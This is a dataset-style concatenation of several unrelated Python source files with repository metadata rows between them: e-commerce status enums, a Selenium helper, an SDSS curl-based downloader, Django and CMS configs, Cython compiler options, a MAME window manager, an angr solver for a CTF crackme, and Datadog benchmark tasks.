            ProductAvailabilityStatus.NOT_PUBLISHED: ("Product status", "not published"),
            ProductAvailabilityStatus.VARIANTS_MISSSING: ("Product status", "variants missing"),
            ProductAvailabilityStatus.OUT_OF_STOCK: ("Product status", "out of stock"),
            ProductAvailabilityStatus.LOW_STOCK: ("Product status", "stock running low"),
            ProductAvailabilityStatus.NOT_YET_AVAILABLE: ("Product status", "not yet available"),
            ProductAvailabilityStatus.READY_FOR_PURCHASE: ("Product status", "ready for purchase"),
        }
        if status not in labels:
            raise NotImplementedError("Unknown status: %s" % status)
        context, message = labels[status]
        return pgettext_lazy(context, message)
class VariantAvailabilityStatus:
    """Machine-readable variant availability states with translated labels."""

    AVAILABLE = "available"
    OUT_OF_STOCK = "out-of-stock"

    @staticmethod
    def get_display(status):
        """Return the translated label for *status*.

        Raises NotImplementedError for unrecognised statuses.
        """
        labels = {
            VariantAvailabilityStatus.AVAILABLE: ("Variant status", "available"),
            VariantAvailabilityStatus.OUT_OF_STOCK: ("Variant status", "out of stock"),
        }
        if status not in labels:
            raise NotImplementedError("Unknown status: %s" % status)
        context, message = labels[status]
        return pgettext_lazy(context, message)
class AttributeInputType:
    """The type that we expect to render the attribute's values as."""

    DROPDOWN = "dropdown"
    MULTISELECT = "multiselect"

    # (value, localized label) pairs, in Django choices format.
    CHOICES = [
        (DROPDOWN, pgettext_lazy("Attribute input type", "Dropdown")),
        (MULTISELECT, pgettext_lazy("Attribute input type", "Multi Select")),
    ]
    # list the input types that cannot be assigned to a variant
    NON_ASSIGNABLE_TO_VARIANTS = [MULTISELECT]
| 38.298246 | 77 | 0.690792 |
795ae17ef48dc73966ed0fb0a088bdc009a6273d | 1,571 | py | Python | Basic/action.py | Redbuffhu/APP_huanlejiac | 8495a76a5211ea7346a9ed01f348cd81b56197ed | [
"Apache-2.0"
] | null | null | null | Basic/action.py | Redbuffhu/APP_huanlejiac | 8495a76a5211ea7346a9ed01f348cd81b56197ed | [
"Apache-2.0"
] | null | null | null | Basic/action.py | Redbuffhu/APP_huanlejiac | 8495a76a5211ea7346a9ed01f348cd81b56197ed | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import time, allure
from selenium.webdriver.support.wait import WebDriverWait
from Basic.utils import log
class ElementActions(object):
    """Convenience wrapper bundling common WebDriver element operations
    (screenshots, explicit waits, clicks, text input)."""

    def __init__(self, driver):
        # The Appium/Selenium WebDriver instance all actions run against.
        self.driver = driver

    def get_img(self, name='App截图'):
        """Take a screenshot and attach it to the allure report as a PNG."""
        png_data = self.driver.get_screenshot_as_png()
        # current_time = time.strftime("_%H:%m:%s_", time.localtime(time.time()))  # time format used on Linux
        current_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(time.time()))
        current_name = name + current_time + ".png"
        print(current_name)
        allure.attach(png_data, name=current_name, attachment_type=allure.attachment_type.PNG)

    def sleep(self, s, islog=True):
        """Sleep for *s* seconds, optionally logging the wait.

        Returns self so calls can be chained.
        """
        if islog:  # idiomatic truthiness instead of the original "== True"
            message = "sleep等待{}s".format(str(s))
            log.info(message)
        time.sleep(s)
        return self

    def find_element(self, loc, timeout=10):
        """
        Wrap find_element with an explicit wait.

        :param loc: a (By.*, 'value') locator tuple, unpacked into find_element
        :param timeout: maximum seconds to wait for the element to appear
        :return: the located element object
        """
        return WebDriverWait(self.driver, timeout).until(lambda x: x.find_element(*loc))

    def click_element(self, loc):
        """Locate the element for *loc* and click it."""
        self.find_element(loc).click()

    def input_text(self, loc, text):
        """Clear the element for *loc* and type *text* into it.

        :param text: the text to enter
        """
        # NOTE(review): the found element is stored on self.fm as in the
        # original — kept in case other code relies on that attribute.
        self.fm = self.find_element(loc)
        self.fm.clear()
        self.fm.send_keys(text)
| 30.803922 | 96 | 0.57161 |
795ae1801ec498cc40edc191369d9fec19f72c7d | 9,674 | py | Python | python/sdss_access/sync/curl.py | sdss/sdss_access | 04531f969a6eccfb71b78fc604e2381da3249cb4 | [
"BSD-3-Clause"
] | 6 | 2019-01-21T03:02:55.000Z | 2022-01-10T00:47:08.000Z | python/sdss_access/sync/curl.py | sdss/sdss_access | 04531f969a6eccfb71b78fc604e2381da3249cb4 | [
"BSD-3-Clause"
] | 23 | 2017-04-10T14:59:57.000Z | 2021-09-24T21:08:36.000Z | python/sdss_access/sync/curl.py | sdss/sdss_access | 04531f969a6eccfb71b78fc604e2381da3249cb4 | [
"BSD-3-Clause"
] | 2 | 2017-07-01T07:02:03.000Z | 2019-04-22T12:49:55.000Z | from __future__ import absolute_import, division, print_function, unicode_literals
# The line above will help with 2to3 support.
import distutils.spawn
import re
import time
from os import popen
from os.path import exists, dirname, join, basename, getsize, getmtime, sep
from datetime import datetime, timedelta
from sdss_access import AccessError
from sdss_access.sync.baseaccess import BaseAccess
from sdss_access import is_posix
try:
from urllib2 import (HTTPPasswordMgrWithDefaultRealm, HTTPBasicAuthHandler, build_opener,
install_opener, urlopen)
except Exception:
from urllib.request import (HTTPPasswordMgrWithDefaultRealm, HTTPBasicAuthHandler, build_opener,
install_opener, urlopen)
class CurlAccess(BaseAccess):
    """Class for providing Curl access to SDSS SAS Paths
    """
    remote_scheme = 'https'
    access_mode = 'curl'

    def __init__(self, label='sdss_curl', stream_count=5, mirror=False, public=False, release=None,
                 verbose=False):
        # Fail fast if the curl binary is not on the PATH, since every
        # download performed by this class shells out to it.
        if not distutils.spawn.find_executable('curl'):
            msg = ('cURL does not appear to be installed. To install, the cURL '
                   'download wizard is located at: https://curl.haxx.se/dlwiz/. '
                   'Installation tutorials for cURL (software from https://curl.haxx.se) '
                   'are available online.')
            raise AccessError(msg)
        super(CurlAccess, self).__init__(stream_count=stream_count, mirror=mirror, public=public,
                                         release=release, verbose=verbose, label=label)

    def __repr__(self):
        return '<CurlAccess(using="{0}")>'.format(self.netloc)

    def get_task_status(self, task=None):
        """Return True when the task's source expands to at least one remote file.

        Raises AccessError when the expansion fails or matches nothing.
        """
        if task:
            try:
                self.set_url_list(task['source'])
                is_there_any_files = len(self.file_line_list) > 0
                err = 'Found no files' if not is_there_any_files else ''
            except Exception as e:
                err = e
                is_there_any_files = False
            if not is_there_any_files:
                raise AccessError("Return code %r\n" % err)
        else:
            is_there_any_files = False
        return is_there_any_files

    def set_url_password(self, url_directory):
        """ Authorize User on sas"""
        # Authenticate against the server root (everything before 'sas') and
        # install the opener globally so later urlopen() calls reuse it.
        url_directory = url_directory.split('sas')[0]
        password_mgr = HTTPPasswordMgrWithDefaultRealm()
        password_mgr.add_password(None, url_directory, self.auth.username, self.auth.password)
        handler = HTTPBasicAuthHandler(password_mgr)
        opener = build_opener(handler)
        opener.open(url_directory)
        install_opener(opener)

    def get_query_list(self, url_query):
        """Search through user specified "*" options and return all possible and valid url paths"""

        # Find query locations and set a descriptive dictionary.  One entry is
        # created per wildcard path segment, plus one for the final segment.
        query_objects = [{'segment_number': index, 'query_directory': '', 'query_list_index': 0,
                          'query_list': [], 'query': query.replace('*', '.*')} for index, query in
                         enumerate(url_query.split('/')) if '*' in query or index == len(url_query.split('/')) - 1]
        # Set quick use observables of query_objects
        segment_numbers = [query_object['segment_number'] for query_object in query_objects]
        max_depth = len(query_objects) - 1
        # Set url array used to append user specified urls
        query_results = []

        # Walk and search through optional branches for potential urls that pass user specifications
        query_depth = None
        if self.verbose:
            print("SDSS_ACCESS> Expanding wildcards %r" % url_query)
        while query_depth != 0:
            if query_depth is None:
                query_depth = 0

            # Set branch directory
            query_objects[query_depth]['query_directory'] = ''
            for segment_index, segment in enumerate(url_query.split('/')[:query_objects[query_depth]['segment_number']]):
                if segment_index not in segment_numbers:
                    query_objects[query_depth]['query_directory'] = '/'.join([query_objects[query_depth]['query_directory'], segment] if query_objects[query_depth]['query_directory'] else [segment])
                else:
                    query_object = query_objects[segment_numbers.index(segment_index)]
                    query_branch = query_object['query_list'][query_object['query_list_index']]
                    query_objects[query_depth]['query_directory'] = '/'.join([query_objects[query_depth]['query_directory'], query_branch])

            # Get user specified url options at branch directory by scraping
            # the server's HTML directory listing with a regex.
            try:
                query_objects[query_depth]['query_list'] = [item.split('"')[0] for item in re.findall(r'<a href="(%s)%s".*</a></td><td>'%(query_objects[query_depth]['query'], '/' if query_depth != max_depth else ''), urlopen(query_objects[query_depth]['query_directory']).read().decode('utf-8').replace('<tr><td><a href="../">Parent directory/</a></td><td>-</td><td>-</td></tr>', ''))]
            except Exception as e:
                query_objects[query_depth]['query_list'] = []
                # Bug fix: membership must be tested against the message text.
                # On Python 3, `'Unauthorized' in e` (an exception instance)
                # raises TypeError instead of detecting the auth failure.
                if 'Unauthorized' in str(e):
                    raise AccessError("Return code %r\n" % e)

            # Append full url's that fit user specifications
            if query_depth == max_depth and len(query_objects[query_depth]['query_list']):
                for item in query_objects[query_depth]['query_list']:
                    query_results.append('/'.join([query_objects[query_depth]['query_directory'], item]))

            # Specify walker logic to recognize when to step down the branch or back up and go to the next option
            if not len(query_objects[query_depth]['query_list']) or query_depth == max_depth:
                query_depth -= 1
                while query_depth > -1 and query_objects[query_depth]['query_list_index'] == len(query_objects[query_depth]['query_list'])-1:
                    query_objects[query_depth]['query_list_index'] = 0
                    query_depth -= 1
                query_objects[query_depth]['query_list_index'] += 1
                query_depth += 1
            else:
                query_depth += 1
        return query_results

    def set_url_list(self, query_path=None):
        """Gets url paths from get_query_list and returns file properties and path"""
        if not is_posix:
            query_path = query_path.replace(sep, '/')
        if not self.public:
            self.set_url_password(query_path)
        self.file_line_list, self.file_size_list, self.file_date_list, self.url_list = [], [], [], []
        for url in self.get_query_list(query_path):
            # Scrape name, byte size, and timestamp from the parent listing.
            file_line, file_size, file_date = re.findall(r'<a href="(%s)".*</a></td><td>\s*(\d*)</td><td>(.*)</td></tr>\r' % basename(url), urlopen(dirname(url)).read().decode('utf-8'))[0]
            self.url_list.append(url)
            self.file_line_list.append(file_line.split('"')[0])
            self.file_size_list.append(file_size)
            self.file_date_list.append(file_date)

    def generate_stream_task(self, task=None, out=None):
        ''' creates the task to put in the download stream '''
        if task:
            location = task['location']
            for filename, file_size, file_date, url in zip(self.file_line_list, self.file_size_list, self.file_date_list, self.url_list):
                location = url.split('/sas/')[-1]
                source = join(self.stream.source, location) if self.remote_base else None
                destination = join(self.stream.destination, location)
                if not is_posix:
                    # Remote paths use '/', local paths use the OS separator.
                    source = source.replace(sep, '/')
                    destination = destination.replace('/', sep)
                    location = location.replace('/', sep)
                if not self.check_file_exists_locally(destination, file_size, file_date):
                    yield (location, source, destination)

    def check_file_exists_locally(self, destination=None, url_file_size=None, url_file_time=None):
        """Checks if file already exists (note that time check is only accurate to the minute)"""
        if exists(destination):
            # For gzipped files compare the uncompressed size reported by gzip -l.
            existing_file_size = int(popen('gzip -l %s' % destination).readlines()[1].split()[0]) if '.gz' in destination else getsize(destination)
            url_file_time = datetime.strptime(url_file_time, "%Y-%b-%d %H:%M" if len(url_file_time.split('-')[0]) == 4 else "%d-%b-%Y %H:%M")
            local_file_time = datetime.utcfromtimestamp(getmtime(destination))
            # Shift the server timestamp by the local UTC offset before comparing.
            url_file_time = url_file_time + timedelta(seconds=time.altzone if time.daylight else time.timezone)
            if existing_file_size == int(url_file_size) and abs(url_file_time - local_file_time).seconds < 60:
                print('Already Downloaded at %s' % destination)
                return True
            else:
                return False
        else:
            return False

    def set_stream_task(self, task=None):
        # Only queue the task when the remote expansion found files.
        status = self.get_task_status(task=task)
        if status:
            super(CurlAccess, self).set_stream_task(task=task)

    def _get_sas_module(self):
        ''' gets the sas module used when committing the download '''
        return "sas"

    def _get_stream_command(self):
        ''' gets the stream command used when committing the download '''
        auth = ''
        if self.auth.username and self.auth.password:
            auth = '-u {0}:{1}'.format(self.auth.username, self.auth.password)

        return "curl {0} --create-dirs --fail -sSRLK {{path}}".format(auth)
| 50.649215 | 385 | 0.625698 |
795ae39331009dda57bb875136a82de0c3647342 | 392 | py | Python | neowand/wsgi.py | ShareDVI/NeoWand | a94e1acd435d334bdba759d5a0b2eb0a46f53af4 | [
"MIT"
] | null | null | null | neowand/wsgi.py | ShareDVI/NeoWand | a94e1acd435d334bdba759d5a0b2eb0a46f53af4 | [
"MIT"
] | null | null | null | neowand/wsgi.py | ShareDVI/NeoWand | a94e1acd435d334bdba759d5a0b2eb0a46f53af4 | [
"MIT"
] | null | null | null | """
WSGI config for neowand project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os

from django.core.wsgi import get_wsgi_application

# Point Django at the project settings (unless already set) before building
# the WSGI callable that servers like gunicorn/uwsgi will import.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "neowand.settings")

application = get_wsgi_application()
| 23.058824 | 78 | 0.785714 |
795ae3b72d76eebbb9c0955de60ccd5f2a2d1d25 | 308 | py | Python | 18 Regular Expressions/specialcharacters.py | Himanshu44626748/Learn-Python | f3a4d997f2d29b146e5f7434f4801ae94bc3483f | [
"MIT"
] | 2 | 2020-03-16T14:57:44.000Z | 2020-11-29T07:45:54.000Z | 18 Regular Expressions/specialcharacters.py | Himanshu44626748/Learn-Python | f3a4d997f2d29b146e5f7434f4801ae94bc3483f | [
"MIT"
] | null | null | null | 18 Regular Expressions/specialcharacters.py | Himanshu44626748/Learn-Python | f3a4d997f2d29b146e5f7434f4801ae94bc3483f | [
"MIT"
] | 1 | 2020-08-13T07:59:02.000Z | 2020-08-13T07:59:02.000Z | '''
\
.
^ - searches from beginning
$
[...]
[^....]
(...)
(R | S) can use 2 regular expressions, either this or that will be executed
'''
import re
# Renamed from `str` to `text`: the original name shadowed the builtin str type.
text = "Take up 1 1-03-2019 one 23 idea.One 567idea at a time 20-1-2021"
# ^T\w* anchors at the start of the string: the leading "T" plus any
# following word characters — here it matches only "Take".
result = re.findall(r'^T\w*', text)
print(result)
795ae46ded125414be206af2775ab0ddca604626 | 204 | py | Python | RecoEgamma/EgammaIsolationAlgos/python/pfBlockBasedIsolation_cfi.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 6 | 2017-09-08T14:12:56.000Z | 2022-03-09T23:57:01.000Z | RecoEgamma/EgammaIsolationAlgos/python/pfBlockBasedIsolation_cfi.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 545 | 2017-09-19T17:10:19.000Z | 2022-03-07T16:55:27.000Z | RecoEgamma/EgammaIsolationAlgos/python/pfBlockBasedIsolation_cfi.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 14 | 2017-10-04T09:47:21.000Z | 2019-10-23T18:04:45.000Z | import FWCore.ParameterSet.Config as cms
# cms.PSet holding the configuration for the 'pfBlockBasedIsolation' component.
pfBlockBasedIsolation = cms.PSet(
    #required inputs
    ComponentName = cms.string('pfBlockBasedIsolation'),
    coneSize = cms.double(9999999999)  # effectively unbounded cone size
    )
| 18.545455 | 56 | 0.720588 |
795ae53f39bfa73cc04a7435ecee3e1eee316751 | 2,546 | py | Python | WindowManager.py | Bob-Z/RandoMame | 2073d0f1f3de6b7c2f7c090ee79509adb2a1d302 | [
"Apache-2.0"
] | 2 | 2021-11-13T16:28:04.000Z | 2022-02-24T16:56:15.000Z | WindowManager.py | Bob-Z/RandoMame | 2073d0f1f3de6b7c2f7c090ee79509adb2a1d302 | [
"Apache-2.0"
] | null | null | null | WindowManager.py | Bob-Z/RandoMame | 2073d0f1f3de6b7c2f7c090ee79509adb2a1d302 | [
"Apache-2.0"
] | 1 | 2021-11-13T16:26:19.000Z | 2021-11-13T16:26:19.000Z | import sys
import time
import Mode
import Config
import Desktop
import Display
import Window
import Sound
import Record
import XmlGetter
import os
from Desktop import DesktopClass
from WindowPosition import WindowPosition
# Module-level state shared between start() and shutdown().
running = True  # NOTE(review): not read anywhere in this chunk — confirm usage elsewhere
sound_index = 0  # index of the window currently holding audio focus
window = []  # Window.Window instances created by start()
start_command_launched = False  # NOTE(review): unused here; windows expose get_start_command_launched() instead
def start():
    """Create the configured windows and run the main loop until all windows
    die or the user presses a key, then shut everything down and exit."""
    global window
    window_position = WindowPosition()

    # Use an explicitly configured desktop geometry when provided, otherwise
    # detect it: desktop_info is [x, y, width, height].
    if Config.desktop is not None:
        desktop_info = [Config.desktop[0], Config.desktop[1], Config.desktop[2], Config.desktop[3]]
    else:
        desktop_info = Desktop.get_desktop_size()

    position = window_position.get(Config.windows_quantity, 0, 0, desktop_info[2], desktop_info[3])

    Display.init(desktop_info)

    if Config.mode == "music" or Config.smart_sound_timeout_sec > 0:
        Sound.init()

    machine_list, soft_list = XmlGetter.get()
    if machine_list is not None:
        print("MAME version: ", machine_list.attrib["build"])
        print(len(machine_list), " unique machines")
    if soft_list is not None:
        print(len(soft_list), " softwares lists")

    Mode.init(machine_list, soft_list)

    desktop = DesktopClass()

    for index in range(Config.windows_quantity):
        window.append(Window.Window(desktop, index, desktop_info[0], desktop_info[1], position[index]))

    global sound_index
    while Display.wait_for_keyboard() is False:
        # Rotate audio focus to the previous window when the current one has
        # been silent for longer than the configured timeout.
        if Config.smart_sound_timeout_sec > 0:
            if Sound.get_silence_duration_sec() > Config.smart_sound_timeout_sec:
                sound_index = sound_index - 1
                if sound_index == -1:
                    sound_index = Config.windows_quantity - 1
                for w in window:
                    w.set_sound_index(sound_index)
                Sound.reset()

        # Leave the loop as soon as no window is alive any more
        # (replaces the original manual flag-and-break loop).
        if not any(w.is_alive() for w in window):
            break

    if Config.end_duration is not None:
        if Config.record is None:
            time.sleep(float(Config.end_duration))

    if Config.end_command is not None and window[0].get_start_command_launched() is True:
        print("Execute end command:", Config.end_command)
        os.system(Config.end_command)

    print("Shutdown remaining windows")
    shutdown()
    print("Stop sound recording thread")
    Sound.kill()
    print("Wait for remaining windows")
    for w in window:
        w.join()
    sys.exit(0)
def shutdown():
    """Ask every managed window to stop."""
    global window
    for managed_window in window:
        managed_window.stop()
| 24.480769 | 103 | 0.649647 |
795ae6aada3c5543b959d24a7d6b449c95e9d7bc | 2,363 | py | Python | examples/google2016_unbreakable_1/solve.py | Alex97/angr-doc | fb28648694e9edb52b3726a3434b6c6e35966289 | [
"BSD-2-Clause"
] | 1 | 2021-08-30T06:56:31.000Z | 2021-08-30T06:56:31.000Z | examples/google2016_unbreakable_1/solve.py | pcy190/angr-doc | c2465b4ecbb44fe3c201bd76f2a7b2306c278c7f | [
"BSD-2-Clause"
] | null | null | null | examples/google2016_unbreakable_1/solve.py | pcy190/angr-doc | c2465b4ecbb44fe3c201bd76f2a7b2306c278c7f | [
"BSD-2-Clause"
] | 1 | 2022-03-31T07:42:51.000Z | 2022-03-31T07:42:51.000Z | #!/usr/bin/env python2
"""
In this challenge we are given a binary that checks an input given as a
command line argument. If it is correct, 'Thank you - product activated!' is
printed. If it is incorrect, 'Product activation failure %d' is printed with a
specific error code.
Reversing shows that the program verifies that various operations on specific
characters of input are equal to zero. Because of the program's linear nature
and reliance on verbose constraints, angr is perfect for solving this challenge
quickly. On a virtual machine, it took ~7 seconds to solve.
Author: scienceman (@docileninja)
Team: bitsforeveryone (USMA)
"""
import angr
START_ADDR = 0x4005bd # first part of program that does computation
AVOID_ADDR = 0x400850 # address of function that prints wrong
FIND_ADDR = 0x400830 # address of function that prints correct
INPUT_ADDR = 0x6042c0 # location in memory of user input
INPUT_LENGTH = 0xf2 - 0xc0 + 1 # derived from the first and last character
# reference in data
def extract_memory(state):
    """Convenience method that returns the flag input memory as concrete bytes."""
    # Reads INPUT_LENGTH bytes at INPUT_ADDR and concretizes them via the solver.
    return state.solver.eval(state.memory.load(INPUT_ADDR, INPUT_LENGTH), cast_to=bytes)
def char(state, n):
    """Returns a symbolic BitVector and constrains it to printable chars for a given state."""
    vec = state.solver.BVS('c{}'.format(n), 8, explicit_name=True)
    # Constrain the byte to the printable ASCII range [' ', '~'].
    return vec, state.solver.And(vec >= ord(' '), vec <= ord('~'))
def main():
    """Symbolically execute the check routine and solve for the accepted flag."""
    p = angr.Project('unbreakable')

    print('adding BitVectors and constraints')
    # Start execution directly at the computation, skipping program setup.
    state = p.factory.blank_state(addr=START_ADDR, add_options={angr.options.LAZY_SOLVES})
    for i in range(INPUT_LENGTH):
        c, cond = char(state, i)
        # the first command line argument is copied to INPUT_ADDR in memory
        # so we store the BitVectors for angr to manipulate
        state.memory.store(INPUT_ADDR + i, c)
        state.add_constraints(cond)

    print('creating simgr')
    ex = p.factory.simulation_manager(state)
    print('running explorer')
    # Search for the success print, pruning paths that hit the failure print.
    ex.explore(find=(FIND_ADDR,), avoid=(AVOID_ADDR,))

    flag = extract_memory(ex.one_found)  # ex.one_found is equiv. to ex.found[0]

    print('found flag: {}'.format(flag))

    return flag
def test():
    # Regression check: the solver must recover the known CTF flag.
    assert main() == b'CTF{0The1Quick2Brown3Fox4Jumped5Over6The7Lazy8Fox9}'

if __name__ == '__main__':
    main()
| 36.353846 | 93 | 0.714769 |
795ae78cff0cef2e3b763e737f8aea64524869d0 | 3,958 | py | Python | tasks/bench.py | KSerrania/datadog-agent | e1819b7bd2007a8fa82956bff22d03bf5a18617f | [
"Apache-2.0"
] | 1 | 2021-01-28T14:23:38.000Z | 2021-01-28T14:23:38.000Z | tasks/bench.py | KSerrania/datadog-agent | e1819b7bd2007a8fa82956bff22d03bf5a18617f | [
"Apache-2.0"
] | 3 | 2020-11-28T18:07:27.000Z | 2021-03-24T17:23:50.000Z | tasks/bench.py | KSerrania/datadog-agent | e1819b7bd2007a8fa82956bff22d03bf5a18617f | [
"Apache-2.0"
] | 1 | 2021-06-24T06:41:48.000Z | 2021-06-24T06:41:48.000Z | """
Benchmarking tasks
"""
from __future__ import print_function
import os
import sys
from invoke import task
from .build_tags import get_default_build_tags
from .utils import REPO_PATH, bin_name, get_git_branch_name
# constants
BENCHMARKS_BIN_PATH = os.path.join(".", "bin", "benchmarks")
@task
def build_aggregator(ctx, rebuild=False, arch="x64"):
    """
    Build the Aggregator benchmarks.

    :param rebuild: force rebuilding all packages (go build -a)
    :param arch: target architecture passed through to the build-tag helper
    """
    build_tags = get_default_build_tags(build="test", arch=arch)  # pass all the build flags
    ldflags = ""
    gcflags = ""

    # When the DELVE env var is set, build with flags friendly to the delve debugger.
    if os.environ.get("DELVE"):
        gcflags = "-N -l"
        if sys.platform == 'win32':
            # On windows, need to build with the extra argument -ldflags="-linkmode internal"
            # if you want to be able to use the delve debugger.
            ldflags += " -linkmode internal"

    cmd = "go build -mod={go_mod} {build_type} -tags \"{build_tags}\" -o {bin_name} "
    cmd += "{ldflags} {gcflags} {REPO_PATH}/test/benchmarks/aggregator"
    args = {
        "go_mod": "vendor",
        "build_type": "-a" if rebuild else "",
        "build_tags": " ".join(build_tags),
        "bin_name": os.path.join(BENCHMARKS_BIN_PATH, bin_name("aggregator")),
        "ldflags": ldflags,
        "gcflags": gcflags,
        "REPO_PATH": REPO_PATH,
    }
    ctx.run(cmd.format(**args))
@task
def build_dogstatsd(ctx, arch="x64"):
    """
    Build Dogstatsd benchmarks.
    """
    tags = get_default_build_tags(build="test", arch=arch)  # pass all the build flags
    target_binary = os.path.join(BENCHMARKS_BIN_PATH, bin_name("dogstatsd"))
    build_cmd = "go build -mod={go_mod} -tags \"{build_tags}\" -o {bin_name} {REPO_PATH}/test/benchmarks/dogstatsd"
    ctx.run(build_cmd.format(
        go_mod="vendor",
        build_tags=" ".join(tags),
        bin_name=target_binary,
        REPO_PATH=REPO_PATH,
    ))
@task
def build_kubernetes_state(ctx, arch="x64"):
    """
    Build Kubernetes_State benchmarks.
    """
    tags = get_default_build_tags(build="test", arch=arch)  # pass all the build flags
    target_binary = os.path.join(BENCHMARKS_BIN_PATH, bin_name("kubernetes_state"))
    build_cmd = "go build -mod={go_mod} -tags \"{build_tags}\" -o {bin_name} {REPO_PATH}/test/benchmarks/kubernetes_state"
    ctx.run(build_cmd.format(
        go_mod="vendor",
        build_tags=" ".join(tags),
        bin_name=target_binary,
        REPO_PATH=REPO_PATH,
    ))
@task(pre=[build_dogstatsd])
def dogstatsd(ctx):
    """
    Run Dogstatsd Benchmarks.
    """
    bin_path = os.path.join(BENCHMARKS_BIN_PATH, bin_name("dogstatsd"))
    # Tag results with the current branch name so runs are comparable across branches.
    branch_name = os.environ.get("DD_REPO_BRANCH_NAME") or get_git_branch_name()
    options = "-branch {}".format(branch_name)
    key = os.environ.get("DD_AGENT_API_KEY")
    if key:
        # Forward the API key to the benchmark binary when one is configured.
        options += " -api-key {}".format(key)

    ctx.run("{} -pps=5000 -dur 45 -ser 5 -brk -inc 1000 {}".format(bin_path, options))
# Temporarily keep compatibility after typo fix
@task(pre=[build_dogstatsd])
def dogstastd(ctx):
    # Misspelled alias retained so existing invocations keep working;
    # simply delegates to the correctly named task.
    dogstatsd(ctx)
@task(pre=[build_aggregator])
def aggregator(ctx):
    """
    Run the Aggregator Benchmarks.
    """
    bin_path = os.path.join(BENCHMARKS_BIN_PATH, bin_name("aggregator"))
    # Tag results with the current branch name so runs are comparable across branches.
    branch_name = os.environ.get("DD_REPO_BRANCH_NAME") or get_git_branch_name()
    options = "-branch {}".format(branch_name)
    key = os.environ.get("DD_AGENT_API_KEY")
    if key:
        # Forward the API key to the benchmark binary when one is configured.
        options += " -api-key {}".format(key)

    # First pass: throughput run; second pass adds memory profiling for 10s.
    ctx.run("{} -points 2,10,100,500,1000 -series 10,100,1000 -log-level info -json {}".format(bin_path, options))
    ctx.run(
        "{} -points 2,10,100,500,1000 -series 10,100,1000 -log-level info -json -memory -duration 10 {}".format(
            bin_path, options
        )
    )
@task(pre=[build_kubernetes_state])
def kubernetes_state(ctx):
    """
    Run Kubernetes_State Benchmarks.
    """
    bin_path = os.path.join(BENCHMARKS_BIN_PATH, bin_name("kubernetes_state"))
    # Run the benchmark binary with its default settings.
    ctx.run("{}".format(bin_path))
| 29.537313 | 116 | 0.641738 |
795ae86edd00ef5e80e8da261409680fc1959e84 | 11,167 | py | Python | Cython/Compiler/Options.py | felix-salfelder/cython | 5446ec2921d6247611978cd17c66e215421b20c4 | [
"Apache-2.0"
] | 2 | 2021-08-20T02:33:24.000Z | 2021-11-17T10:54:00.000Z | Cython/Compiler/Options.py | felix-salfelder/cython | 5446ec2921d6247611978cd17c66e215421b20c4 | [
"Apache-2.0"
] | null | null | null | Cython/Compiler/Options.py | felix-salfelder/cython | 5446ec2921d6247611978cd17c66e215421b20c4 | [
"Apache-2.0"
] | null | null | null | #
# Cython - Compilation-wide options and pragma declarations
#
# Perform lookups on builtin names only once, at module initialisation
# time. This will prevent the module from getting imported if a
# builtin name that it uses cannot be found during initialisation.
cache_builtins = True
embed_pos_in_docstring = False
gcc_branch_hints = True
pre_import = None
docstrings = True
# Decref global variables in this module on exit for garbage collection.
# 0: None, 1+: interned objects, 2+: cdef globals, 3+: types objects
# Mostly for reducing noise for Valgrind, only executes at process exit
# (when all memory will be reclaimed anyways).
generate_cleanup_code = False
annotate = False
# This will abort the compilation on the first error occured rather than trying
# to keep going and printing further error messages.
fast_fail = False
# Make all warnings into errors.
warning_errors = False
# Make unknown names an error. Python raises a NameError when
# encountering unknown names at runtime, whereas this option makes
# them a compile time error. If you want full Python compatibility,
# you should disable this option and also 'cache_builtins'.
error_on_unknown_names = True
# Make uninitialized local variable reference a compile time error.
# Python raises UnboundLocalError at runtime, whereas this option makes
# them a compile time error. Note that this option affects only variables
# of "python object" type.
error_on_uninitialized = True
# This will convert statements of the form "for i in range(...)"
# to "for i from ..." when i is a cdef'd integer type, and the direction
# (i.e. sign of step) can be determined.
# WARNING: This may change the semantics if the range causes assignment to
# i to overflow. Specifically, if this option is set, an error will be
# raised before the loop is entered, wheras without this option the loop
# will execute until an overflowing value is encountered.
convert_range = True
# Enable this to allow one to write your_module.foo = ... to overwrite the
# definition if the cpdef function foo, at the cost of an extra dictionary
# lookup on every call.
# If this is 0 it simply creates a wrapper.
lookup_module_cpdef = False
# Whether or not to embed the Python interpreter, for use in making a
# standalone executable or calling from external libraries.
# This will provide a method which initalizes the interpreter and
# executes the body of this module.
embed = None
# In previous iterations of Cython, globals() gave the first non-Cython module
# globals in the call stack. Sage relies on this behavior for variable injection.
old_style_globals = False
# Allows cimporting from a pyx file without a pxd file.
cimport_from_pyx = False
# max # of dims for buffers -- set lower than number of dimensions in numpy, as
# slices are passed by value and involve a lot of copying
buffer_max_dims = 8
# Number of function closure instances to keep in a freelist (0: no freelists)
closure_freelist_size = 8
# Declare compiler directives
# Default value for every compiler directive.  User code can override these
# per-module or per-function; dotted keys ('warn.unused') are sub-directives
# grouped under their prefix.
directive_defaults = {
    'boundscheck' : True,
    'nonecheck' : False,
    'initializedcheck' : True,
    'embedsignature' : False,
    'locals' : {},
    'auto_cpdef': False,
    'cdivision': False, # was True before 0.12
    'cdivision_warnings': False,
    'overflowcheck': False,
    'overflowcheck.fold': True,
    'always_allow_keywords': False,
    'allow_none_for_extension_args': True,
    'wraparound' : True,
    'ccomplex' : False, # use C99/C++ for complex types and arith
    'callspec' : "",
    'final' : False,
    'internal' : False,
    'profile': False,
    'linetrace': False,
    'infer_types': None,
    'infer_types.verbose': False,
    'autotestdict': True,
    'autotestdict.cdef': False,
    'autotestdict.all': False,
    'language_level': 2,
    'fast_getattr': False, # Undocumented until we come up with a better way to handle this everywhere.
    'py2_import': False, # For backward compatibility of Cython's source code in Py3 source mode
    'c_string_type': 'bytes',
    'c_string_encoding': '',
    'type_version_tag': True,   # enables Py_TPFLAGS_HAVE_VERSION_TAG on extension types
    # set __file__ and/or __path__ to known source/target path at import time (instead of not having them available)
    'set_initial_path' : None, # SOURCEFILE or "/full/path/to/module"
    'warn': None,
    'warn.undeclared': False,
